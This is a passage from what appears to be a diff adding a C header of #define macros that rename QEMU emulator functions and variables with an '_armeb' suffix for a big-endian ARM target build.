pmsav5_data_ap_read pmsav5_data_ap_read_armeb +#define pmsav5_data_ap_write pmsav5_data_ap_write_armeb +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_armeb +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_armeb +#define pmuserenr_write pmuserenr_write_armeb +#define pmxevtyper_write pmxevtyper_write_armeb +#define print_type_bool print_type_bool_armeb +#define print_type_int print_type_int_armeb +#define print_type_number 
print_type_number_armeb +#define print_type_size print_type_size_armeb +#define print_type_str print_type_str_armeb +#define propagateFloat128NaN propagateFloat128NaN_armeb +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_armeb +#define propagateFloat32NaN propagateFloat32NaN_armeb +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_armeb +#define propagateFloat64NaN propagateFloat64NaN_armeb +#define propagateFloatx80NaN propagateFloatx80NaN_armeb +#define property_get_alias property_get_alias_armeb +#define property_get_bool property_get_bool_armeb +#define property_get_str property_get_str_armeb +#define property_get_uint16_ptr property_get_uint16_ptr_armeb +#define property_get_uint32_ptr property_get_uint32_ptr_armeb +#define property_get_uint64_ptr property_get_uint64_ptr_armeb +#define property_get_uint8_ptr property_get_uint8_ptr_armeb +#define property_release_alias property_release_alias_armeb +#define property_release_bool property_release_bool_armeb +#define property_release_str property_release_str_armeb +#define property_resolve_alias property_resolve_alias_armeb +#define property_set_alias property_set_alias_armeb +#define property_set_bool property_set_bool_armeb +#define property_set_str property_set_str_armeb +#define pstate_read pstate_read_armeb +#define pstate_write pstate_write_armeb +#define pxa250_initfn pxa250_initfn_armeb +#define pxa255_initfn pxa255_initfn_armeb +#define pxa260_initfn pxa260_initfn_armeb +#define pxa261_initfn pxa261_initfn_armeb +#define pxa262_initfn pxa262_initfn_armeb +#define pxa270a0_initfn pxa270a0_initfn_armeb +#define pxa270a1_initfn pxa270a1_initfn_armeb +#define pxa270b0_initfn pxa270b0_initfn_armeb +#define pxa270b1_initfn pxa270b1_initfn_armeb +#define pxa270c0_initfn pxa270c0_initfn_armeb +#define pxa270c5_initfn pxa270c5_initfn_armeb +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_armeb +#define qapi_dealloc_end_list qapi_dealloc_end_list_armeb +#define 
qapi_dealloc_end_struct qapi_dealloc_end_struct_armeb +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_armeb +#define qapi_dealloc_next_list qapi_dealloc_next_list_armeb +#define qapi_dealloc_pop qapi_dealloc_pop_armeb +#define qapi_dealloc_push qapi_dealloc_push_armeb +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_armeb +#define qapi_dealloc_start_list qapi_dealloc_start_list_armeb +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_armeb +#define qapi_dealloc_start_union qapi_dealloc_start_union_armeb +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_armeb +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_armeb +#define qapi_dealloc_type_int qapi_dealloc_type_int_armeb +#define qapi_dealloc_type_number qapi_dealloc_type_number_armeb +#define qapi_dealloc_type_size qapi_dealloc_type_size_armeb +#define qapi_dealloc_type_str qapi_dealloc_type_str_armeb +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_armeb +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_armeb +#define qapi_free_boolList qapi_free_boolList_armeb +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_armeb +#define qapi_free_int16List qapi_free_int16List_armeb +#define qapi_free_int32List qapi_free_int32List_armeb +#define qapi_free_int64List qapi_free_int64List_armeb +#define qapi_free_int8List qapi_free_int8List_armeb +#define qapi_free_intList qapi_free_intList_armeb +#define qapi_free_numberList qapi_free_numberList_armeb +#define qapi_free_strList qapi_free_strList_armeb +#define qapi_free_uint16List qapi_free_uint16List_armeb +#define qapi_free_uint32List qapi_free_uint32List_armeb +#define qapi_free_uint64List qapi_free_uint64List_armeb +#define qapi_free_uint8List qapi_free_uint8List_armeb +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_armeb +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_armeb +#define qapi_free_X86CPURegister32List 
qapi_free_X86CPURegister32List_armeb +#define qbool_destroy_obj qbool_destroy_obj_armeb +#define qbool_from_int qbool_from_int_armeb +#define qbool_get_int qbool_get_int_armeb +#define qbool_type qbool_type_armeb +#define qbus_create qbus_create_armeb +#define qbus_create_inplace qbus_create_inplace_armeb +#define qbus_finalize qbus_finalize_armeb +#define qbus_initfn qbus_initfn_armeb +#define qbus_realize qbus_realize_armeb +#define qdev_create qdev_create_armeb +#define qdev_get_type qdev_get_type_armeb +#define qdev_register_types qdev_register_types_armeb +#define qdev_set_parent_bus qdev_set_parent_bus_armeb +#define qdev_try_create qdev_try_create_armeb +#define qdict_add_key qdict_add_key_armeb +#define qdict_array_split qdict_array_split_armeb +#define qdict_clone_shallow qdict_clone_shallow_armeb +#define qdict_del qdict_del_armeb +#define qdict_destroy_obj qdict_destroy_obj_armeb +#define qdict_entry_key qdict_entry_key_armeb +#define qdict_entry_value qdict_entry_value_armeb +#define qdict_extract_subqdict qdict_extract_subqdict_armeb +#define qdict_find qdict_find_armeb +#define qdict_first qdict_first_armeb +#define qdict_flatten qdict_flatten_armeb +#define qdict_flatten_qdict qdict_flatten_qdict_armeb +#define qdict_flatten_qlist qdict_flatten_qlist_armeb +#define qdict_get qdict_get_armeb +#define qdict_get_bool qdict_get_bool_armeb +#define qdict_get_double qdict_get_double_armeb +#define qdict_get_int qdict_get_int_armeb +#define qdict_get_obj qdict_get_obj_armeb +#define qdict_get_qdict qdict_get_qdict_armeb +#define qdict_get_qlist qdict_get_qlist_armeb +#define qdict_get_str qdict_get_str_armeb +#define qdict_get_try_bool qdict_get_try_bool_armeb +#define qdict_get_try_int qdict_get_try_int_armeb +#define qdict_get_try_str qdict_get_try_str_armeb +#define qdict_haskey qdict_haskey_armeb +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_armeb +#define qdict_iter qdict_iter_armeb +#define qdict_join qdict_join_armeb +#define 
qdict_new qdict_new_armeb +#define qdict_next qdict_next_armeb +#define qdict_next_entry qdict_next_entry_armeb +#define qdict_put_obj qdict_put_obj_armeb +#define qdict_size qdict_size_armeb +#define qdict_type qdict_type_armeb +#define qemu_clock_get_us qemu_clock_get_us_armeb +#define qemu_clock_ptr qemu_clock_ptr_armeb +#define qemu_clocks qemu_clocks_armeb +#define qemu_get_cpu qemu_get_cpu_armeb +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_armeb +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_armeb +#define qemu_get_ram_block qemu_get_ram_block_armeb +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_armeb +#define qemu_get_ram_fd qemu_get_ram_fd_armeb +#define qemu_get_ram_ptr qemu_get_ram_ptr_armeb +#define qemu_host_page_mask qemu_host_page_mask_armeb +#define qemu_host_page_size qemu_host_page_size_armeb +#define qemu_init_vcpu qemu_init_vcpu_armeb +#define qemu_ld_helpers qemu_ld_helpers_armeb +#define qemu_log_close qemu_log_close_armeb +#define qemu_log_enabled qemu_log_enabled_armeb +#define qemu_log_flush qemu_log_flush_armeb +#define qemu_loglevel_mask qemu_loglevel_mask_armeb +#define qemu_log_vprintf qemu_log_vprintf_armeb +#define qemu_oom_check qemu_oom_check_armeb +#define qemu_parse_fd qemu_parse_fd_armeb +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_armeb +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_armeb +#define qemu_ram_alloc qemu_ram_alloc_armeb +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_armeb +#define qemu_ram_foreach_block qemu_ram_foreach_block_armeb +#define qemu_ram_free qemu_ram_free_armeb +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_armeb +#define qemu_ram_ptr_length qemu_ram_ptr_length_armeb +#define qemu_ram_remap qemu_ram_remap_armeb +#define qemu_ram_setup_dump qemu_ram_setup_dump_armeb +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_armeb +#define qemu_real_host_page_size 
qemu_real_host_page_size_armeb +#define qemu_st_helpers qemu_st_helpers_armeb +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_armeb +#define qemu_try_memalign qemu_try_memalign_armeb +#define qentry_destroy qentry_destroy_armeb +#define qerror_human qerror_human_armeb +#define qerror_report qerror_report_armeb +#define qerror_report_err qerror_report_err_armeb +#define qfloat_destroy_obj qfloat_destroy_obj_armeb +#define qfloat_from_double qfloat_from_double_armeb +#define qfloat_get_double qfloat_get_double_armeb +#define qfloat_type qfloat_type_armeb +#define qint_destroy_obj qint_destroy_obj_armeb +#define qint_from_int qint_from_int_armeb +#define qint_get_int qint_get_int_armeb +#define qint_type qint_type_armeb +#define qlist_append_obj qlist_append_obj_armeb +#define qlist_copy qlist_copy_armeb +#define qlist_copy_elem qlist_copy_elem_armeb +#define qlist_destroy_obj qlist_destroy_obj_armeb +#define qlist_empty qlist_empty_armeb +#define qlist_entry_obj qlist_entry_obj_armeb +#define qlist_first qlist_first_armeb +#define qlist_iter qlist_iter_armeb +#define qlist_new qlist_new_armeb +#define qlist_next qlist_next_armeb +#define qlist_peek qlist_peek_armeb +#define qlist_pop qlist_pop_armeb +#define qlist_size qlist_size_armeb +#define qlist_size_iter qlist_size_iter_armeb +#define qlist_type qlist_type_armeb +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_armeb +#define qmp_input_end_list qmp_input_end_list_armeb +#define qmp_input_end_struct qmp_input_end_struct_armeb +#define qmp_input_get_next_type qmp_input_get_next_type_armeb +#define qmp_input_get_object qmp_input_get_object_armeb +#define qmp_input_get_visitor qmp_input_get_visitor_armeb +#define qmp_input_next_list qmp_input_next_list_armeb +#define qmp_input_optional qmp_input_optional_armeb +#define qmp_input_pop qmp_input_pop_armeb +#define qmp_input_push qmp_input_push_armeb +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_armeb +#define 
qmp_input_start_list qmp_input_start_list_armeb +#define qmp_input_start_struct qmp_input_start_struct_armeb +#define qmp_input_type_bool qmp_input_type_bool_armeb +#define qmp_input_type_int qmp_input_type_int_armeb +#define qmp_input_type_number qmp_input_type_number_armeb +#define qmp_input_type_str qmp_input_type_str_armeb +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_armeb +#define qmp_input_visitor_new qmp_input_visitor_new_armeb +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_armeb +#define qmp_output_add_obj qmp_output_add_obj_armeb +#define qmp_output_end_list qmp_output_end_list_armeb +#define qmp_output_end_struct qmp_output_end_struct_armeb +#define qmp_output_first qmp_output_first_armeb +#define qmp_output_get_qobject qmp_output_get_qobject_armeb +#define qmp_output_get_visitor qmp_output_get_visitor_armeb +#define qmp_output_last qmp_output_last_armeb +#define qmp_output_next_list qmp_output_next_list_armeb +#define qmp_output_pop qmp_output_pop_armeb +#define qmp_output_push_obj qmp_output_push_obj_armeb +#define qmp_output_start_list qmp_output_start_list_armeb +#define qmp_output_start_struct qmp_output_start_struct_armeb +#define qmp_output_type_bool qmp_output_type_bool_armeb +#define qmp_output_type_int qmp_output_type_int_armeb +#define qmp_output_type_number qmp_output_type_number_armeb +#define qmp_output_type_str qmp_output_type_str_armeb +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_armeb +#define qmp_output_visitor_new qmp_output_visitor_new_armeb +#define qobject_decref qobject_decref_armeb +#define qobject_to_qbool qobject_to_qbool_armeb +#define qobject_to_qdict qobject_to_qdict_armeb +#define qobject_to_qfloat qobject_to_qfloat_armeb +#define qobject_to_qint qobject_to_qint_armeb +#define qobject_to_qlist qobject_to_qlist_armeb +#define qobject_to_qstring qobject_to_qstring_armeb +#define qobject_type qobject_type_armeb +#define qstring_append qstring_append_armeb +#define 
qstring_append_chr qstring_append_chr_armeb +#define qstring_append_int qstring_append_int_armeb +#define qstring_destroy_obj qstring_destroy_obj_armeb +#define qstring_from_escaped_str qstring_from_escaped_str_armeb +#define qstring_from_str qstring_from_str_armeb +#define qstring_from_substr qstring_from_substr_armeb +#define qstring_get_length qstring_get_length_armeb +#define qstring_get_str qstring_get_str_armeb +#define qstring_new qstring_new_armeb +#define qstring_type qstring_type_armeb +#define ram_block_add ram_block_add_armeb +#define ram_size ram_size_armeb +#define range_compare range_compare_armeb +#define range_covers_byte range_covers_byte_armeb +#define range_get_last range_get_last_armeb +#define range_merge range_merge_armeb +#define ranges_can_merge ranges_can_merge_armeb +#define raw_read raw_read_armeb +#define raw_write raw_write_armeb +#define rcon rcon_armeb +#define read_raw_cp_reg read_raw_cp_reg_armeb +#define recip_estimate recip_estimate_armeb +#define recip_sqrt_estimate recip_sqrt_estimate_armeb +#define register_cp_regs_for_features register_cp_regs_for_features_armeb +#define register_multipage register_multipage_armeb +#define register_subpage register_subpage_armeb +#define register_tm_clones register_tm_clones_armeb +#define register_types_object register_types_object_armeb +#define regnames regnames_armeb +#define render_memory_region render_memory_region_armeb +#define reset_all_temps reset_all_temps_armeb +#define reset_temp reset_temp_armeb +#define rol32 rol32_armeb +#define rol64 rol64_armeb +#define ror32 ror32_armeb +#define ror64 ror64_armeb +#define roundAndPackFloat128 roundAndPackFloat128_armeb +#define roundAndPackFloat16 roundAndPackFloat16_armeb +#define roundAndPackFloat32 roundAndPackFloat32_armeb +#define roundAndPackFloat64 roundAndPackFloat64_armeb +#define roundAndPackFloatx80 roundAndPackFloatx80_armeb +#define roundAndPackInt32 roundAndPackInt32_armeb +#define roundAndPackInt64 roundAndPackInt64_armeb 
+#define roundAndPackUint64 roundAndPackUint64_armeb +#define round_to_inf round_to_inf_armeb +#define run_on_cpu run_on_cpu_armeb +#define s0 s0_armeb +#define S0 S0_armeb +#define s1 s1_armeb +#define S1 S1_armeb +#define sa1100_initfn sa1100_initfn_armeb +#define sa1110_initfn sa1110_initfn_armeb +#define save_globals save_globals_armeb +#define scr_write scr_write_armeb +#define sctlr_write sctlr_write_armeb +#define set_bit set_bit_armeb +#define set_bits set_bits_armeb +#define set_default_nan_mode set_default_nan_mode_armeb +#define set_feature set_feature_armeb +#define set_float_detect_tininess set_float_detect_tininess_armeb +#define set_float_exception_flags set_float_exception_flags_armeb +#define set_float_rounding_mode set_float_rounding_mode_armeb +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_armeb +#define set_flush_to_zero set_flush_to_zero_armeb +#define set_swi_errno set_swi_errno_armeb +#define sextract32 sextract32_armeb +#define sextract64 sextract64_armeb +#define shift128ExtraRightJamming shift128ExtraRightJamming_armeb +#define shift128Right shift128Right_armeb +#define shift128RightJamming shift128RightJamming_armeb +#define shift32RightJamming shift32RightJamming_armeb +#define shift64ExtraRightJamming shift64ExtraRightJamming_armeb +#define shift64RightJamming shift64RightJamming_armeb +#define shifter_out_im shifter_out_im_armeb +#define shortShift128Left shortShift128Left_armeb +#define shortShift192Left shortShift192Left_armeb +#define simple_mpu_ap_bits simple_mpu_ap_bits_armeb +#define size_code_gen_buffer size_code_gen_buffer_armeb +#define softmmu_lock_user softmmu_lock_user_armeb +#define softmmu_lock_user_string softmmu_lock_user_string_armeb +#define softmmu_tget32 softmmu_tget32_armeb +#define softmmu_tget8 softmmu_tget8_armeb +#define softmmu_tput32 softmmu_tput32_armeb +#define softmmu_unlock_user softmmu_unlock_user_armeb +#define sort_constraints sort_constraints_armeb +#define sp_el0_access 
sp_el0_access_armeb +#define spsel_read spsel_read_armeb +#define spsel_write spsel_write_armeb +#define start_list start_list_armeb +#define stb_p stb_p_armeb +#define stb_phys stb_phys_armeb +#define stl_be_p stl_be_p_armeb +#define stl_be_phys stl_be_phys_armeb +#define stl_he_p stl_he_p_armeb +#define stl_le_p stl_le_p_armeb +#define stl_le_phys stl_le_phys_armeb +#define stl_phys stl_phys_armeb +#define stl_phys_internal stl_phys_internal_armeb +#define stl_phys_notdirty stl_phys_notdirty_armeb +#define store_cpu_offset store_cpu_offset_armeb +#define store_reg store_reg_armeb +#define store_reg_bx store_reg_bx_armeb +#define store_reg_from_load store_reg_from_load_armeb +#define stq_be_p stq_be_p_armeb +#define stq_be_phys stq_be_phys_armeb +#define stq_he_p stq_he_p_armeb +#define stq_le_p stq_le_p_armeb +#define stq_le_phys stq_le_phys_armeb +#define stq_phys stq_phys_armeb +#define string_input_get_visitor string_input_get_visitor_armeb +#define string_input_visitor_cleanup string_input_visitor_cleanup_armeb +#define string_input_visitor_new string_input_visitor_new_armeb +#define strongarm_cp_reginfo strongarm_cp_reginfo_armeb +#define strstart strstart_armeb +#define strtosz strtosz_armeb +#define strtosz_suffix strtosz_suffix_armeb +#define stw_be_p stw_be_p_armeb +#define stw_be_phys stw_be_phys_armeb +#define stw_he_p stw_he_p_armeb +#define stw_le_p stw_le_p_armeb +#define stw_le_phys stw_le_phys_armeb +#define stw_phys stw_phys_armeb +#define stw_phys_internal stw_phys_internal_armeb +#define sub128 sub128_armeb +#define sub16_sat sub16_sat_armeb +#define sub16_usat sub16_usat_armeb +#define sub192 sub192_armeb +#define sub8_sat sub8_sat_armeb +#define sub8_usat sub8_usat_armeb +#define subFloat128Sigs subFloat128Sigs_armeb +#define subFloat32Sigs subFloat32Sigs_armeb +#define subFloat64Sigs subFloat64Sigs_armeb +#define subFloatx80Sigs subFloatx80Sigs_armeb +#define subpage_accepts subpage_accepts_armeb +#define subpage_init subpage_init_armeb 
+#define subpage_ops subpage_ops_armeb +#define subpage_read subpage_read_armeb +#define subpage_register subpage_register_armeb +#define subpage_write subpage_write_armeb +#define suffix_mul suffix_mul_armeb +#define swap_commutative swap_commutative_armeb +#define swap_commutative2 swap_commutative2_armeb +#define switch_mode switch_mode_armeb +#define switch_v7m_sp switch_v7m_sp_armeb +#define syn_aa32_bkpt syn_aa32_bkpt_armeb +#define syn_aa32_hvc syn_aa32_hvc_armeb +#define syn_aa32_smc syn_aa32_smc_armeb +#define syn_aa32_svc syn_aa32_svc_armeb +#define syn_breakpoint syn_breakpoint_armeb +#define sync_globals sync_globals_armeb +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_armeb +#define syn_cp14_rt_trap syn_cp14_rt_trap_armeb +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_armeb +#define syn_cp15_rt_trap syn_cp15_rt_trap_armeb +#define syn_data_abort syn_data_abort_armeb +#define syn_fp_access_trap syn_fp_access_trap_armeb +#define syn_insn_abort syn_insn_abort_armeb +#define syn_swstep syn_swstep_armeb +#define syn_uncategorized syn_uncategorized_armeb +#define syn_watchpoint syn_watchpoint_armeb +#define syscall_err syscall_err_armeb +#define system_bus_class_init system_bus_class_init_armeb +#define system_bus_info system_bus_info_armeb +#define t2ee_cp_reginfo t2ee_cp_reginfo_armeb +#define table_logic_cc table_logic_cc_armeb +#define target_parse_constraint target_parse_constraint_armeb +#define target_words_bigendian target_words_bigendian_armeb +#define tb_add_jump tb_add_jump_armeb +#define tb_alloc tb_alloc_armeb +#define tb_alloc_page tb_alloc_page_armeb +#define tb_check_watchpoint tb_check_watchpoint_armeb +#define tb_find_fast tb_find_fast_armeb +#define tb_find_pc tb_find_pc_armeb +#define tb_find_slow tb_find_slow_armeb +#define tb_flush tb_flush_armeb +#define tb_flush_jmp_cache tb_flush_jmp_cache_armeb +#define tb_free tb_free_armeb +#define tb_gen_code tb_gen_code_armeb +#define tb_hash_remove tb_hash_remove_armeb +#define 
tb_invalidate_phys_addr tb_invalidate_phys_addr_armeb +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_armeb +#define tb_invalidate_phys_range tb_invalidate_phys_range_armeb +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_armeb +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_armeb +#define tb_jmp_remove tb_jmp_remove_armeb +#define tb_link_page tb_link_page_armeb +#define tb_page_remove tb_page_remove_armeb +#define tb_phys_hash_func tb_phys_hash_func_armeb +#define tb_phys_invalidate tb_phys_invalidate_armeb +#define tb_reset_jump tb_reset_jump_armeb +#define tb_set_jmp_target tb_set_jmp_target_armeb +#define tcg_accel_class_init tcg_accel_class_init_armeb +#define tcg_accel_type tcg_accel_type_armeb +#define tcg_add_param_i32 tcg_add_param_i32_armeb +#define tcg_add_param_i64 tcg_add_param_i64_armeb +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_armeb +#define tcg_allowed tcg_allowed_armeb +#define tcg_canonicalize_memop tcg_canonicalize_memop_armeb +#define tcg_commit tcg_commit_armeb +#define tcg_cond_to_jcc tcg_cond_to_jcc_armeb +#define tcg_constant_folding tcg_constant_folding_armeb +#define tcg_const_i32 tcg_const_i32_armeb +#define tcg_const_i64 tcg_const_i64_armeb +#define tcg_const_local_i32 tcg_const_local_i32_armeb +#define tcg_const_local_i64 tcg_const_local_i64_armeb +#define tcg_context_init tcg_context_init_armeb +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_armeb +#define tcg_cpu_exec tcg_cpu_exec_armeb +#define tcg_current_code_size tcg_current_code_size_armeb +#define tcg_dump_info tcg_dump_info_armeb +#define tcg_dump_ops tcg_dump_ops_armeb +#define tcg_exec_all tcg_exec_all_armeb +#define tcg_find_helper tcg_find_helper_armeb +#define tcg_func_start tcg_func_start_armeb +#define tcg_gen_abs_i32 tcg_gen_abs_i32_armeb +#define tcg_gen_add2_i32 tcg_gen_add2_i32_armeb +#define tcg_gen_add_i32 tcg_gen_add_i32_armeb +#define tcg_gen_add_i64 tcg_gen_add_i64_armeb +#define 
tcg_gen_addi_i32 tcg_gen_addi_i32_armeb +#define tcg_gen_addi_i64 tcg_gen_addi_i64_armeb +#define tcg_gen_andc_i32 tcg_gen_andc_i32_armeb +#define tcg_gen_and_i32 tcg_gen_and_i32_armeb +#define tcg_gen_and_i64 tcg_gen_and_i64_armeb +#define tcg_gen_andi_i32 tcg_gen_andi_i32_armeb +#define tcg_gen_andi_i64 tcg_gen_andi_i64_armeb +#define tcg_gen_br tcg_gen_br_armeb +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_armeb +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_armeb +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_armeb +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_armeb +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_armeb +#define tcg_gen_callN tcg_gen_callN_armeb +#define tcg_gen_code tcg_gen_code_armeb +#define tcg_gen_code_common tcg_gen_code_common_armeb +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_armeb +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_armeb +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_armeb +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_armeb +#define tcg_gen_exit_tb tcg_gen_exit_tb_armeb +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_armeb +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_armeb +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_armeb +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_armeb +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_armeb +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_armeb +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_armeb +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_armeb +#define tcg_gen_goto_tb tcg_gen_goto_tb_armeb +#define tcg_gen_ld_i32 tcg_gen_ld_i32_armeb +#define tcg_gen_ld_i64 tcg_gen_ld_i64_armeb +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_armeb +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_armeb +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_armeb +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_armeb +#define tcg_gen_mov_i32 tcg_gen_mov_i32_armeb +#define tcg_gen_mov_i64 tcg_gen_mov_i64_armeb +#define tcg_gen_movi_i32 tcg_gen_movi_i32_armeb 
+#define tcg_gen_movi_i64 tcg_gen_movi_i64_armeb +#define tcg_gen_mul_i32 tcg_gen_mul_i32_armeb +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_armeb +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_armeb +#define tcg_gen_neg_i32 tcg_gen_neg_i32_armeb +#define tcg_gen_neg_i64 tcg_gen_neg_i64_armeb +#define tcg_gen_not_i32 tcg_gen_not_i32_armeb +#define tcg_gen_op0 tcg_gen_op0_armeb +#define tcg_gen_op1i tcg_gen_op1i_armeb +#define tcg_gen_op2_i32 tcg_gen_op2_i32_armeb +#define tcg_gen_op2_i64 tcg_gen_op2_i64_armeb +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_armeb +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_armeb +#define tcg_gen_op3_i32 tcg_gen_op3_i32_armeb +#define tcg_gen_op3_i64 tcg_gen_op3_i64_armeb +#define tcg_gen_op4_i32 tcg_gen_op4_i32_armeb +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_armeb +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_armeb +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_armeb +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_armeb +#define tcg_gen_op6_i32 tcg_gen_op6_i32_armeb +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_armeb +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_armeb +#define tcg_gen_orc_i32 tcg_gen_orc_i32_armeb +#define tcg_gen_or_i32 tcg_gen_or_i32_armeb +#define tcg_gen_or_i64 tcg_gen_or_i64_armeb +#define tcg_gen_ori_i32 tcg_gen_ori_i32_armeb +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_armeb +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_armeb +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_armeb +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_armeb +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_armeb +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_armeb +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_armeb +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_armeb +#define tcg_gen_sar_i32 tcg_gen_sar_i32_armeb +#define tcg_gen_sari_i32 tcg_gen_sari_i32_armeb +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_armeb +#define tcg_gen_shl_i32 tcg_gen_shl_i32_armeb +#define tcg_gen_shl_i64 tcg_gen_shl_i64_armeb +#define tcg_gen_shli_i32 tcg_gen_shli_i32_armeb 
+#define tcg_gen_shli_i64 tcg_gen_shli_i64_armeb +#define tcg_gen_shr_i32 tcg_gen_shr_i32_armeb +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_armeb +#define tcg_gen_shr_i64 tcg_gen_shr_i64_armeb +#define tcg_gen_shri_i32 tcg_gen_shri_i32_armeb +#define tcg_gen_shri_i64 tcg_gen_shri_i64_armeb +#define tcg_gen_st_i32 tcg_gen_st_i32_armeb +#define tcg_gen_st_i64 tcg_gen_st_i64_armeb +#define tcg_gen_sub_i32 tcg_gen_sub_i32_armeb +#define tcg_gen_sub_i64 tcg_gen_sub_i64_armeb +#define tcg_gen_subi_i32 tcg_gen_subi_i32_armeb +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_armeb +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_armeb +#define tcg_gen_xor_i32 tcg_gen_xor_i32_armeb +#define tcg_gen_xor_i64 tcg_gen_xor_i64_armeb +#define tcg_gen_xori_i32 tcg_gen_xori_i32_armeb +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_armeb +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_armeb +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_armeb +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_armeb +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_armeb +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_armeb +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_armeb +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_armeb +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_armeb +#define tcg_handle_interrupt tcg_handle_interrupt_armeb +#define tcg_init tcg_init_armeb +#define tcg_invert_cond tcg_invert_cond_armeb +#define tcg_la_bb_end tcg_la_bb_end_armeb +#define tcg_la_br_end tcg_la_br_end_armeb +#define tcg_la_func_end tcg_la_func_end_armeb +#define tcg_liveness_analysis tcg_liveness_analysis_armeb +#define tcg_malloc tcg_malloc_armeb +#define tcg_malloc_internal tcg_malloc_internal_armeb +#define tcg_op_defs_org tcg_op_defs_org_armeb +#define tcg_opt_gen_mov tcg_opt_gen_mov_armeb +#define tcg_opt_gen_movi tcg_opt_gen_movi_armeb +#define tcg_optimize tcg_optimize_armeb +#define tcg_out16 tcg_out16_armeb +#define 
